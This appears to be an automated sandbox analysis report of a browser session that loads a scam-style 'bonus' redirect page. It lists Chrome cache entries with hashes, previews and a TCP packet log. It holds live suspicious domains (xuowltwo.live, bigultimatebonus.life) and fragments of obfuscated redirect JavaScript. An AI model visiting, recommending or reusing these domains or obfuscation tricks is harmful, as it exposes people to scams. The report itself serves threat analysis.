                              Preview:var _0x522e=['rKTfbgFcT8ociW','WRm5W6hdM2e3W7RdMG','WOBcM3JdT8kmWPVcMG','WRvksgVcPcSv','qmken8kEWPHP','W4RdGYSLFHqq','cxdcH8oF','W71YxdpcS8koomoiWRxdQCo4WP0','ruRcJuJcINerF8ka','wSoPBcLrqCoMWQq','lSo7W63cMmkZoq','w0FdMSkUWOpdT8k3W4JcSmohzG','naiOW6mVW60PW5BcKSoj','W4rSWRVdQ24cW7JdGsa','imkPDSkNW70y','tufjeNpcRW','W45RW6ddJxKCW43dPG','W4hdQmkpW7qjW4LxWO4','W5ZcJ8oiW4/cNCkaWRhdQmoAWQddQq','imk9Bmk2W64fhmoP','hmosWOu7WRpcS8oh','s0RdKv9W','W4NdR8ouWRy7W4rJWQ5QWQK','wKRdMmkUWOtcQmk/W6RcR8oyFMG','W53cISk4','W5RcISodW4NdRSkSWRZdS8ozWR4','hZXVW57dHspdOG','y8kelK3cVrxcJa','gmkgguJcUWdcKa','W5VdHCkFh8kEph0','W6u8j8o4W5lcRG','h8koguJcRHFcMLm','WObUWRWYcs0Uxrj8','W4/cKuJcTSkXWQ3cJqSnrmkwW5e','svtcLXq','lCkiW5KYwSooW6xcHq','mWCLW6L7WOKzW5/cNSo0WOXH','W6pdJwTTWOZcOWGMy8k3fM4','W4xdQG8vvSkZW647mq','jfvebSkfWRqB','v05rdCkp','FexdQ8otW4BdSSkft0BcJCoHlG','W4aIWOFdV8ouyCkJW5bK','WRpcKgz4k0i2CvZcQSo/W7S','W5ldGCkuWOOiWOlcOG','W4tdOHXMWONcJfxcUSkRkKJdIG'];function _0x6c4b(_0x4706f3,_0x3aa69c){return _0x6c4

                              Chrome Cache Entry: 87

                              Download File
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:Web Open Font Format (Version 2), TrueType, length 9132, version 1.0
                              Category:downloaded
                              Size (bytes):9132
                              Entropy (8bit):7.976558054614219
                              Encrypted:false
                              SSDEEP:192:KAN15BF1l/I2llt5iPqqAr0nnpGZVHnkf4WLjJYY1a5RKnpwDpl:TN71l/BEPqqY0nUZ5kf4KjJYJ5Rl
                              MD5:358D3070946A90B4960CD111154FDC12
                              SHA1:A0BA0BF47A7F905F9AA1A3CE15A39CDAC62466EE
                              SHA-256:54C64F3C66372027154F01FC9F24B4E25FDFE405B70D1994C79ABBC2576FF775
                              SHA-512:DFD522323FB1FDE8BF8FE03D295B40E169F2C0430D2A4F6D75E19577C65255544A6D4CDC90C278EC0AFE0E2002EB5889B0ADFBAE8A2AF8E86F41A12E561B78B9
                              Malicious:false
                              Reputation:low
                              URL:https://fonts.gstatic.com/s/opensans/v17/mem8YaGs126MiZpBA-UFVZ0bf8pkAg.woff2
                              Preview:wOF2......#.......B...#V.............................t.`.......@.U..N..6.$.... ..Z..x..4EE]`...(...DQ.'A.............(.B..8..YRr._;.+...t.}Zl...j.......&..p..W.Jzf...*T....P'....@..r...w.`....tm... l.DA.Hlf.F.:{......*d...T.......S.]....@.'j....=.]....B...J....$K....Q&A...yp.}...M.7@..=.._.....204./5]1.].t.Y...^U.5...*m...Q.I...acL.o....\.9.%.>....;@..rg..$........h.VQ..&>...N..@....qsiV8E....!l......w.Z.|ce.C].'R..Y.../..LVS..,..G..C.....U.kR..H...d@.8...K/.?6<..L..e.Hy.7..2 K..}O.....|..?..;W....c?.BL......:...t..U1.y#...h.2.5p.p5p*..+.D @....*.xS..'.H'.(]..D.@...G...K..^..I..n._...<.W.~><I..E.F.A)..QZ(]..e."......Z{......8q..[...w.F).T...e.....w>....Y5.W...}./\3.G...<...c......'......."P........ZT........#y..>2).)......Q..Q........y.........lW.Y.........%..M.@.s..*...g..8^...N|D.Q.5..,.....8..$A..j..........$.n.....Uj.4..Y..Zv\..K.h.K.+T....}9..*=..-.c.,...#7.|..Xo.L.C2.&M...iPrq.l..)..dE.A...3d..xt.c.(.3.Z.{n...M[.cE.......*...m!.@...'p

                              Chrome Cache Entry: 88

                              Download File
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 60x60, components 3
                              Category:downloaded
                              Size (bytes):4307
                              Entropy (8bit):7.822326185774005
                              Encrypted:false
                              SSDEEP:96:RYB79yK5/PiUjzKzO3CI9oMpxhYba4cqIWHA9eUzGd4:RGsUjyJi/I24bnA9DzM4
                              MD5:F96150CBBB80AC607B3F264141A7FAEF
                              SHA1:9ED21CB4E5C552F29BC23DB55684C945E7582071
                              SHA-256:F013C5F2D9AEDD8072D4BF01749C7DFCBACB80A43D06AA579403ADFD8FD21FD3
                              SHA-512:38D945BF5C43425A8C7DE1B3D940FD747CDFD1DB67CA621FAF75EBF4FCCF7FC5FD4C8D06054BB57EE2A3C8C864045F73C248AFA80A965B46048BBBCBF81DD954
                              Malicious:false
                              Reputation:low
                              URL:https://y1uy13f.xuowltwo.live/media/mainstream/all/ab/fr4.jpg
                              Preview:......JFIF.............C....................................................................C.......................................................................<.<...................................................................................6......M.`..U7L...5..>v..r.....'g.j....Cr*4......-_.G.....w.......h...u".A6.29}xkK....V-....|7..;H'...{....PF.b. ..\.}..@z...J...r..S....akT.A.#l.....U..D."......!.7Y3.t.&.[J..;4......(................................!.1.$B..........S....fp.Z(..L.f..`a..gc.....b......Q.n...4y.F........&...l1.u.....xzz.Y......vU.$[!3..[.~SS..l..|.`.1....qLp....X.j.!...c.v;......L[.SsQ.....Q.V...T...'..v.....ml....}.$.X...V..7.........n..........4.f..o.-*...UI.IfA.+...*3...kA....g(I..Gw%...E.........d...!....x.}`~..m"L.I....[...v..........B.....8>...O.`.1{..B.\..@....8.v..4.w....!...[.=..6......?0^).75y.....:...C......\.O(.P.............j..p./...W;..|J..$..Kq-X..>..0h......M...yZD.....7OLk....i^..i.z.q..]...<?.

                              Chrome Cache Entry: 89

                              Download File
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 60x60, components 3
                              Category:downloaded
                              Size (bytes):2815
                              Entropy (8bit):7.72730325165018
                              Encrypted:false
                              SSDEEP:48:RPY3tust/21fdEaSWVdck6toGh4X/wMdHhED6uT/K7Uy2r:RQ9Rt/4ljdJUS/LHhpmy7Y
                              MD5:9B63CCBD631923743813E838190CECBF
                              SHA1:5C6DD930C81346616E9C641FF41B6F18344C7E76
                              SHA-256:4CA9130A03F6874BAB37D2D52FD4546E3DE34CCCCBD83AA5B9CB6ED0F923D8B3
                              SHA-512:FBA4934D23659CBE293503886E8C406D258AADA0883600F7BEEFED694DEAB175E61FBC1121907A21272955CC463ED622E2D59F88A7D882B6D9C2BB936CADE19D
                              Malicious:false
                              Reputation:low
                              URL:https://y1uy13f.xuowltwo.live/media/mainstream/all/ab/fr2.jpg
                              Preview:......JFIF.............C....................................................................C.......................................................................<.<......................................................................................'.2-...r.YH..\.....\..w,.x...%...rD6P.=S..L.2.~.{.Tn{o/.Q[p..RB....O..g..x.vVKTTV\..,.iz.8M..d.gXQ.w.......O...P..tO.<.'AY..C`.A.>......~&.g.....sW...A~..XB.?...#...............................!"..................L.DR..N....%h...Yx.....P4kP.=..lF.q7.....|....j6.`.....2.zM$..L..k....C..bp.t.IN..++........%8..=.S....| ..H3.u.^..X.L......K...Q..b+..{%..&F...G.A.{.......mdnn+.;..a....v...<n..)......7.eQ..$.....C.G..G<.i!u......6....*).........J..jZ...+...a..%.G.}]..K....B.0.#9...1..JC..}.......6..6.1.......Td.^"b3..........yU..R$]v.yz....;....j ..;T....OO2.....2.3.l.....k..,.j...3.;...l...3...-WI..1...Y..g\....2W+.1..F.=..@./[H....HL+.K..Q.k(..M........7.........................!1.."Aa.2Q.

                              Chrome Cache Entry: 90

                              Download File
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 60x60, components 3
                              Category:dropped
                              Size (bytes):2815
                              Entropy (8bit):7.72730325165018
                              Encrypted:false
                              SSDEEP:48:RPY3tust/21fdEaSWVdck6toGh4X/wMdHhED6uT/K7Uy2r:RQ9Rt/4ljdJUS/LHhpmy7Y
                              MD5:9B63CCBD631923743813E838190CECBF
                              SHA1:5C6DD930C81346616E9C641FF41B6F18344C7E76
                              SHA-256:4CA9130A03F6874BAB37D2D52FD4546E3DE34CCCCBD83AA5B9CB6ED0F923D8B3
                              SHA-512:FBA4934D23659CBE293503886E8C406D258AADA0883600F7BEEFED694DEAB175E61FBC1121907A21272955CC463ED622E2D59F88A7D882B6D9C2BB936CADE19D
                              Malicious:false
                              Reputation:low
                              Preview:......JFIF.............C....................................................................C.......................................................................<.<......................................................................................'.2-...r.YH..\.....\..w,.x...%...rD6P.=S..L.2.~.{.Tn{o/.Q[p..RB....O..g..x.vVKTTV\..,.iz.8M..d.gXQ.w.......O...P..tO.<.'AY..C`.A.>......~&.g.....sW...A~..XB.?...#...............................!"..................L.DR..N....%h...Yx.....P4kP.=..lF.q7.....|....j6.`.....2.zM$..L..k....C..bp.t.IN..++........%8..=.S....| ..H3.u.^..X.L......K...Q..b+..{%..&F...G.A.{.......mdnn+.;..a....v...<n..)......7.eQ..$.....C.G..G<.i!u......6....*).........J..jZ...+...a..%.G.}]..K....B.0.#9...1..JC..}.......6..6.1.......Td.^"b3..........yU..R$]v.yz....;....j ..;T....OO2.....2.3.l.....k..,.j...3.;...l...3...-WI..1...Y..g\....2W+.1..F.=..@./[H....HL+.K..Q.k(..M........7.........................!1.."Aa.2Q.

                              Chrome Cache Entry: 91

                              Download File
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:PNG image data, 258 x 184, 8-bit colormap, non-interlaced
                              Category:dropped
                              Size (bytes):593
                              Entropy (8bit):6.937948084207512
                              Encrypted:false
                              SSDEEP:12:6v/7XJlBzBvvvn10eUQG3uwRg8UfpyUXcAtYNlbv7pVFY1r:W3vvnzUQGLgPIU3av7pVC
                              MD5:EE850988ED56CD6F2498CAE7993A8753
                              SHA1:965F9091CA3E7F21F5B8115347227AEDC93C586E
                              SHA-256:0303153A716BC5000D737521C0F6EB517700A1856B8E22BA8C088EC8F06ED8BA
                              SHA-512:318D7E98A343E7F2B54EDB6A8285F1E09E0DCF9F663B7B1EBEFD20A33A980B9E843196F1E0818C7BDF35313D9A26D91839B519DFC8BC8B203A40180A5461F188
                              Malicious:false
                              Reputation:low
                              Preview:.PNG........IHDR.............?......ZPLTE...". 6.0646@?A@?AA@B". ". ". ". A@B". 0-/A@B". A@B". A@BA@B". A@BA@B". A@BA@B". ". A@B98:.qP.....tRNS.@. @.....p0..PP..`...p`..h.....IDATx....Z.@..a@.2.M-....uw..S...........(...................&..,..&.._.._..gU[?....H._...dS...&..S....~q.:'.ZU...."./.!D...n".p..X}..a.>.Y.f......DOE.....t..}xL(Cl~..........a.wd.....O..0.ih^.... .C.....$.......s......._#Ah...J.|~.7........:...~,..C:.._}...$8.u9.......m".L.8.....>..x&..`....ls. .$8L.i.8..E......~..X.JP..|...|.q...........f...,_..U[?M.._(.?:......................|....X.J.#....IEND.B`.

                              Chrome Cache Entry: 92

                              Download File
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:PNG image data, 258 x 184, 8-bit colormap, non-interlaced
                              Category:downloaded
                              Size (bytes):5836
                              Entropy (8bit):7.913203736419961
                              Encrypted:false
                              SSDEEP:96:Dc5iJbjQKbV3zd+YdCtH5dEq6oxmFVfnm61tJP4ppUKhp/+jbytfyWGs:Dc5uPtbHHdIH5I9FtfpopUKCjby9t
                              MD5:890D869DB1B3D28AF588BE81685214F2
                              SHA1:5375BD0C2C75A6E40168F5561EB4ECA993D14505
                              SHA-256:EA2521ADD13DEB769FB7ABEE364670A567E7A3DC7B3B4474B5F80510DC593212
                              SHA-512:18F59F36A708EF22CCA24F8ED65146FEDBD28BF4D153D23D015ECDC1EDC929BAF5240B7A1BF50FF76A5E2335AD1818D98684C1807E5B56D4FE6FEE756BD42256
                              Malicious:false
                              Reputation:low
                              URL:https://y1uy13f.xuowltwo.live/media/mainstream/all/ab/box_closed.png
                              Preview:.PNG........IHDR.............?.......PLTE............................................................................................................+(........................................................................................!............."............. ..!...........q..|........u......JI.<:......h.............~}.mlNNN....+).$#_..............sttghh[\\.=<.....ut.+*...xx.jj.dc.ZY.US.ED.DB.75.31...........wv.vu.``.[[......'%..ecc=;NY.....5tRNS..@...@ .0..m...} ..P0zPC..``.......`....p@....l.......IDATx...mK#1.........=.X{r.....H.DB.,......d...g.vq......3...3g.9s..3g.9..z.)....-....)......WM.rH }...g..y.......xk...l.......O...H....b.)...P=?..x)..<..S6..^..C...HP.....0...'iP>h.l......@.$....&y5..`>`...3.h.5.`...8.S..Q ....D .>D.p$..m...."....u.k.....[.H...!...f[..{...@`..U1....1@.^....g....0..|r..(U...........A0..2...RKO.A..Y...v...$.T...m/......Z1...r[...o..^`(.....E1.<B'`s....4.......8......`"k....Bl."...cy4.X....X

                              Chrome Cache Entry: 93

                              Download File
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 60x60, components 3
                              Category:downloaded
                              Size (bytes):3601
                              Entropy (8bit):7.815973019413374
                              Encrypted:false
                              SSDEEP:96:RHYz89aCbdm3mZE8qmCCk147EtLUDFWk1lo2kpdLR:RHYznCZmAq0ZYteF9lodpR
                              MD5:C74A5BEFD416E24626972E88ED65526D
                              SHA1:4E8C25553248600CF23C3D6BCEC488D986A129F8
                              SHA-256:53BB570F4465306A78670ECBEA911BA0362251D2DC825D9EA0CB5D1C70F413AC
                              SHA-512:BCC99E5266CC46054DD7A5CD061C87BE597FFD6885027B82FDE9883FE910AF222D50C2D1E33E17CC202733EA1F0DE6AB1B5720503D8FBB5A6CE069EBF3DA718B
                              Malicious:false
                              Reputation:low
                              URL:https://y1uy13f.xuowltwo.live/media/mainstream/all/ab/fr3.jpg
                              Preview:......JFIF.............C....................................................................C.......................................................................<.<.....................................................................................y(g...B..{P...!%7}5{..V...)z..E..L.....b.(.xo;.....jJ.!+.rw...5.[eS.yhe.?..]..A+a..qX...tVa.m..=ni%K".....}..$.US.6...v[F./....H.S^b.d......9....I.l,.M.=h........l..#-S..hJj..Tk8.CU. ......&.................................!%&...........~.m.E.V......6o.X...~.effgC...|?.u..2.......,.....x..W.}.~c..&..}.W...7....O\y.......n...r..MdR........L.^.m(.:9.z...V........`-'.....k.O....".!..&9>.."..rZ..l.........=.....T...2>....+...5Y..."..wM.x..o.vg.Y"~..........;`.....0..uz..-.,G4BbI.+.#....S..._.*.oD.H^.b:.-....H...q.............<nH.@B?.K..c.....k..../...#Y.+y..H\.4E(t.t~..:.....Jka..J..zo.x...j}...|yj..qa..=c)-g....}...*....e.c..x7..._.eZ.`..,...j.eVb..,Nz...eH.......^...E..(..!.d.........f..c....%.X.I.y...X]i[.&

                              Chrome Cache Entry: 94

                              Download File
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (6570), with no line terminators
                              Category:downloaded
                              Size (bytes):6570
                              Entropy (8bit):5.6798536951957574
                              Encrypted:false
                              SSDEEP:192:xjV5q2TaABbd4qafcBh0bRiCu2VJneRhnbX95e:5Gkd4qlh0tiCu2VteRBbX95e
                              MD5:A8E36248F01478844F0C4DB185E945A0
                              SHA1:D822225C2E21CD5FD7910F825DA1E646B21DC078
                              SHA-256:9195437B3D4FFD3D3652DF03D4DE4FF03C454386EC19A1777DA588A2F83827C2
                              SHA-512:4C526C5C46DC0FFB2B2E43DB626165B39E69BD16CEA9E32CBD4F40DF4678BB311271800CFF2D4475B8BB91042362FC88F9D3CB9611E52AC2E1A09921A8EED631
                              Malicious:false
                              Reputation:low
                              URL:https://y1uy13f.xuowltwo.live/media/mainstream/icon.js
                              Preview:const _0x3791=['F8oHBwTfdCoPWR3cLIDdnq','BCoermoudg07g2dcL8oUCX8','pqKkW5v5caddUJlcQCkhbW','W4PmWPiLWRRdS8oMWPOrWRhdH3yMpa','WPndmqqDWOqWwujVDCkX','W7vmW4DeW6hcHXNcOmkGW4S','W6hcI1CREmopWO1cvG','W601W6ZcVNzg','yxxdPmkFW6mPW5OGafu6W7SWW6O','et8gW6RdKCoaW7NdMHe','W43cVcDepG','WOddHSo2W5mfW4K','ExqdW4yUW6as','WRuOqSojWRG','W7riW6CDDSoMWQ4','WP8yW5bwW6xcP8oPWOSEWOFdJeq','EmoFuSoCgMeshNhcG8oyAqRcSaa','nYezWOhdVmkgWPOWW7dcHSoy','W4urW6JdRwm','W4/cHNZdRW','WR/dKSkQWRBcNCohWOxcHLJdKXJcHW','W6VcPLm8W5y','W7a4tHZcL8ofjgpcQmk7W73dQG','WPTVtSk+bvlcNhvxWQFcOG','WRfDW6azESopWRCXAG','WO3cNJ9l','W40aW6q','WOP4rSkWb1lcMNfBWQBcO8oNW7G','W5BdRmoH','W7C5W6q','hf7cIeznW7BcVYldNeRcJq','e8kmWRm+WPRcLmomW4ZcIvhdOSkrvvhdImkTWPKqgZ5zphxdUmkRbCkpAmkMW7mEW47cSaRdRMdcJmk5WPpdSSkaW5JdO8kuheqfWP3dKSoAAmoafJfJWPHzk1tcO8o1FH/dP8otWOFcI8ohb0tcGwCGWODTWOldKCo8W5SNW6VcIZxdMY/dLCoBWPWegmo2eSo8FspcVSkNimk8W67cJuBdUruwcmk2W4bWWPiVnmoBW4W','amoaWPCt','W4CPW6ZdTa','avJdJZzb','WPBdKIJcVttdNmotWR7cOtNdSW','WPPqpCoEg8kiv0BdUa','

                              Chrome Cache Entry: 95

                              Download File
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 60x60, components 3
                              Category:downloaded
                              Size (bytes):3043
                              Entropy (8bit):7.750974549902366
                              Encrypted:false
                              SSDEEP:48:R9EMIwCO0aPaBTkOuvGfGUvKFCVG1OINgJi6k/X72jh6ysCl5zFja:RT1CgPayOuveXVGsHU6kPSjh6ysCl5g
                              MD5:7F103BC91A8084CD154189B5EBB2CF86
                              SHA1:375E58C42A8C409BBF111847A1F6798BA6C0D5F5
                              SHA-256:346139AAEC984853288672896D297DED47AC7EE1CB77CA43B63E130952CDD946
                              SHA-512:91AEC64B967B80B4D7E304ECEFD74CB09FFC45FBA69A2337A5863852CCB8C4EEF372A6D5CB7A376883064737361DB64979F77B1E29C2A4674CD8D142BBDCF40D
                              Malicious:false
                              Reputation:low
                              URL:https://y1uy13f.xuowltwo.live/media/mainstream/all/ab/fr5.jpg
                              Preview:......JFIF.............C....................................................................C.......................................................................<.<...........................................................................................xm..E.^#z.o...o...Y....KS......W~YJ@U_...\.}...}.^.G3.....x.".3..?b/.{D...JO(....s...K.k.I........ux|)Q.7.s...V.A.]..Z$....].r.[.Kz...G.(?.....V.4..C.........PNl..F.)x.-x...#................................!...........=a..S....!.7.D.4..Kcb..8..#T.b.....F.k....Q....i.*.E...,.v2.oG.y..../..zq.......u..1.sg...^.gV....X.3p?V.,.m.p..+...~.C<<O...{......6L.6..R.>G@.W..q.....Nw2.<h.....E.%e..El...^....!:..#.h.)....=.....Mk.W+.....=k.9S..}.|.....X.U.c....k.&.M...n.b..!T.'....$k:.IC..u.y..TM6.....v.}b&.Du...;Gb/....59`!.V....q....M..cz..+.Q.L:-...l.".Va..-k..Y..q\.M_.W,e.3>:...h..x.....;p....Y3..Z.H;.x......H.$*c`..=..:J.).).<{.$5.hU..r..T.......&...r.6"....9...eO..........xu...3.........................

                              Chrome Cache Entry: 96

                              Download File
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:HTML document, ASCII text, with very long lines (46678), with CRLF line terminators
                              Category:downloaded
                              Size (bytes):61512
                              Entropy (8bit):5.815057298638429
                              Encrypted:false
                              SSDEEP:768:cXYR49z3ZNhS4pbqWF7C4++ee5M5DIzrUI+1rdAUrJmlIhQ4H+aR7xI7xItM8iux:cXl9bfj5+DIH+Lu8JtD3nuFNwv
                              MD5:85C451E2C86B234581D746F56062BC3B
                              SHA1:6183BFC133447296B63A43ACDEEE846A367349C6
                              SHA-256:A240997718DA52D12ECFCA405E7DAD306EF4142A441729F03BEFB75C38CC1947
                              SHA-512:04A283307E119B606F76A26F9702E66626B34DAF2ABB91583B1395BA9D8FADA3ECAF82E5595E9827D51A378CC472ADE82DD96A408660673E41E28A4947700136
                              Malicious:false
                              Reputation:low
                              URL:https://bigultimatebonus.life/?u=f31yu1y&o=mhxka94&t=NoUNIQ&cid=23n0u3t1tkru
                              Preview: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">....<html xmlns="http://www.w3.org/1999/xhtml">..<head><script>function requestLink(){return {sessionId:['sid','t1~h22irzseq2ep0nacjbfxeqrw'],p1:['','https://xuowltwo.live/crhhigmk/'],jsFpCryptoKey:['','ju6whgjvkqwdsgpi']};}</script>...<title></title>...<meta name="viewport" content="width=320,initial-scale=1"/>.....<style type="text/css">..*{margin:0;padding:0}body{display:flex;flex-direction:column;font:300 100%/1.5 Helvetica Neue,sans-serif;background:#e0e0e0;color:#333;min-height:100vh;justify-content:center;align-items:center}section{text-align:center;animation:2s infinite pulse}@keyframes pulse{0%,100%{transform:scale(1)}50%{transform:scale(1.1)}}..</style>..</head>......<body class="redirecting"><div id='r1'></div>..<section class="redirecting">...<h1>Please Wait...</h1>...<p>Preparing everything you need. Just a moment.</p>..</section>..<p id="demo"></p>......<script ty

                              Chrome Cache Entry: 97

                              Download File
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:PNG image data, 15 x 14, 8-bit colormap, non-interlaced
                              Category:dropped
                              Size (bytes):357
                              Entropy (8bit):6.955852983842003
                              Encrypted:false
                              SSDEEP:6:6v/lhPVtHEfao9uB8R0YYdtuKzMbZjOwpxDNL+G8koNIhRugd2NVwb9RQk/mPZ+0:6v/7PmaDaR0YYPgZPn6BNBcd/mc0Sm7
                              MD5:17586A0AEB3F7B2AA7FB15A9251FBCD4
                              SHA1:6ADFFAD1183C93BC0DC114C89C77365734EC0DD6
                              SHA-256:8BF8DC3A4B6F7E4FA2A6FA74495C212F37A301311980CBC758050993ED9C07E1
                              SHA-512:5BF6CADF6B0BBEDF1BD7964386CC8807128C953CC1CF8DF4515BF4E0980AC3FD9EA8857E1BAA3A87DDDEE16CB97DD4BF3D6B52D8F1E4657E5956727E93DB0351
                              Malicious:false
                              Reputation:low
                              Preview:.PNG........IHDR..............T......PLTE........0\m..........;H...i.......A....Tb....=K.uz.Y`.<I.FR.5D...F.8.z~.]k................>L..&w"5|......Pc.......gx.Vi.E\.....Iv.b...!tRNS.......rF......|xbE<.........i".#....rIDAT..u....@..a.8...(..Vvx...M ....~I.u..m.xj...5..f>..G....,B......T..g..#.;..Kuz9 p.oW..$.......+9.......h...&X=....Z.....IEND.B`.

                              Chrome Cache Entry: 98

                              Download File
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:PNG image data, 258 x 184, 8-bit colormap, non-interlaced
                              Category:dropped
                              Size (bytes):5836
                              Entropy (8bit):7.913203736419961
                              Encrypted:false
                              SSDEEP:96:Dc5iJbjQKbV3zd+YdCtH5dEq6oxmFVfnm61tJP4ppUKhp/+jbytfyWGs:Dc5uPtbHHdIH5I9FtfpopUKCjby9t
                              MD5:890D869DB1B3D28AF588BE81685214F2
                              SHA1:5375BD0C2C75A6E40168F5561EB4ECA993D14505
                              SHA-256:EA2521ADD13DEB769FB7ABEE364670A567E7A3DC7B3B4474B5F80510DC593212
                              SHA-512:18F59F36A708EF22CCA24F8ED65146FEDBD28BF4D153D23D015ECDC1EDC929BAF5240B7A1BF50FF76A5E2335AD1818D98684C1807E5B56D4FE6FEE756BD42256
                              Malicious:false
                              Reputation:low
                              Preview:.PNG........IHDR.............?.......PLTE............................................................................................................+(........................................................................................!............."............. ..!...........q..|........u......JI.<:......h.............~}.mlNNN....+).$#_..............sttghh[\\.=<.....ut.+*...xx.jj.dc.ZY.US.ED.DB.75.31...........wv.vu.``.[[......'%..ecc=;NY.....5tRNS..@...@ .0..m...} ..P0zPC..``.......`....p@....l.......IDATx...mK#1.........=.X{r.....H.DB.,......d...g.vq......3...3g.9s..3g.9..z.)....-....)......WM.rH }...g..y.......xk...l.......O...H....b.)...P=?..x)..<..S6..^..C...HP.....0...'iP>h.l......@.$....&y5..`>`...3.h.5.`...8.S..Q ....D .>D.p$..m...."....u.k.....[.H...!...f[..{...@`..U1....1@.^....g....0..|r..(U...........A0..2...RKO.A..Y...v...$.T...m/......Z1...r[...o..^`(.....E1.<B'`s....4.......8......`"k....Bl."...cy4.X....X

                              Chrome Cache Entry: 99

                              Download File
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with CRLF line terminators
                              Category:downloaded
                              Size (bytes):21546
                              Entropy (8bit):5.369941818211811
                              Encrypted:false
                              SSDEEP:384:+b0VQ8VNLRsYf93CJ5wEdEu1XWqSpQGflVrKEX9EPJBMJBAzy6M8kAit:+b0W87LB8m7QGflxtEPJBMJBAHkX
                              MD5:A42AF1908408284441961EE5FAC7891E
                              SHA1:9C4E5D6EEA95A03464380779A7AB9764E163F3A9
                              SHA-256:36A93A8003AB142DC7446633CF75524283582968CE207F8B773BE234C4ED5CF6
                              SHA-512:9BDBE19CE1DBAF579DF2565249EC84AFED88219737ADCD843F6F967456BCA1A8D111E11A21276954E7D438BB72FC670237EF079B6F1FC936FAE50F8B9441D774
                              Malicious:false
                              Reputation:low
                              URL:https://y1uy13f.xuowltwo.live/media/mainstream/all/ab/1102.css
                              Preview:.css1102_5 {...background: #232f3f..}....#content1,..#content2,..#content3,..#content4 {...width: 50%;...margin: auto;...padding: 15px..}....#content1,..#content2,..#content3 {...border-top: 2px solid #232f3e;...border-right: 2px solid #232f3e;...border-left: 2px solid #232f3e..}....#content4 {...border-right: 2px solid #232f3e;...border-left: 2px solid #232f3e;...border-bottom: 2px solid #232f3e..}.....css1102_6 {...background: #fff no-repeat top left fixed;...border-radius: 10px..}....#congrats {...font-weight: 700..}....#main-logo {...float: left;...max-width: 34vw;...max-height: 55px..}....#css1102_8 {...float: right;...padding-right: 5px;...width: 90px;...max-height: 65px..}....@media only screen and (max-width:800px) {.....#content1,...#content2,...#content3,...#content4 {....width: 61%;....margin: auto;....padding: 10px...}..}....@media only screen and (max-width:630px) {.....#content1,...#content2,...#content3,...#content4 {....width: 95%;....margin: auto;....padding: 10px...}.

                              Static File Info

                              No static file info

                              Network Behavior

                              Network Port Distribution

                              TCP Packets

                              TimestampSource PortDest PortSource IPDest IP
                              Feb 22, 2024 08:09:25.703279972 CET49675443192.168.2.4173.222.162.32
                              Feb 22, 2024 08:09:26.812669039 CET49678443192.168.2.4104.46.162.224
                              Feb 22, 2024 08:09:31.761173964 CET49730443192.168.2.4142.250.64.110
                              Feb 22, 2024 08:09:31.761259079 CET44349730142.250.64.110192.168.2.4
                              Feb 22, 2024 08:09:31.761337042 CET49730443192.168.2.4142.250.64.110
                              Feb 22, 2024 08:09:31.762279034 CET49730443192.168.2.4142.250.64.110
                              Feb 22, 2024 08:09:31.762360096 CET44349730142.250.64.110192.168.2.4
                              Feb 22, 2024 08:09:31.763109922 CET49731443192.168.2.4142.251.16.84
                              Feb 22, 2024 08:09:31.763187885 CET44349731142.251.16.84192.168.2.4
                              Feb 22, 2024 08:09:31.763575077 CET49731443192.168.2.4142.251.16.84
                              Feb 22, 2024 08:09:31.763931990 CET49731443192.168.2.4142.251.16.84
                              Feb 22, 2024 08:09:31.763972044 CET44349731142.251.16.84192.168.2.4
                              Feb 22, 2024 08:09:31.991810083 CET44349731142.251.16.84192.168.2.4
                              Feb 22, 2024 08:09:31.991827011 CET44349730142.250.64.110192.168.2.4
                              Feb 22, 2024 08:09:31.992239952 CET49731443192.168.2.4142.251.16.84
                              Feb 22, 2024 08:09:31.992253065 CET49730443192.168.2.4142.250.64.110
                              Feb 22, 2024 08:09:31.992300987 CET44349731142.251.16.84192.168.2.4
                              Feb 22, 2024 08:09:31.992327929 CET44349730142.250.64.110192.168.2.4
                              Feb 22, 2024 08:09:31.992657900 CET44349730142.250.64.110192.168.2.4
                              Feb 22, 2024 08:09:31.992714882 CET49730443192.168.2.4142.250.64.110
                              Feb 22, 2024 08:09:31.993510962 CET44349731142.251.16.84192.168.2.4
                              Feb 22, 2024 08:09:31.993676901 CET49731443192.168.2.4142.251.16.84
                              Feb 22, 2024 08:09:31.993761063 CET44349730142.250.64.110192.168.2.4
                              Feb 22, 2024 08:09:31.993803978 CET49730443192.168.2.4142.250.64.110
                              Feb 22, 2024 08:09:31.996519089 CET49730443192.168.2.4142.250.64.110
                              Feb 22, 2024 08:09:31.996588945 CET44349730142.250.64.110192.168.2.4
                              Feb 22, 2024 08:09:31.997594118 CET49730443192.168.2.4142.250.64.110
                              Feb 22, 2024 08:09:31.997649908 CET44349730142.250.64.110192.168.2.4
                              Feb 22, 2024 08:09:31.999006987 CET49731443192.168.2.4142.251.16.84
                              Feb 22, 2024 08:09:31.999169111 CET49731443192.168.2.4142.251.16.84
                              Feb 22, 2024 08:09:31.999193907 CET44349731142.251.16.84192.168.2.4
                              Feb 22, 2024 08:09:31.999236107 CET44349731142.251.16.84192.168.2.4
                              Feb 22, 2024 08:09:32.046160936 CET49731443192.168.2.4142.251.16.84
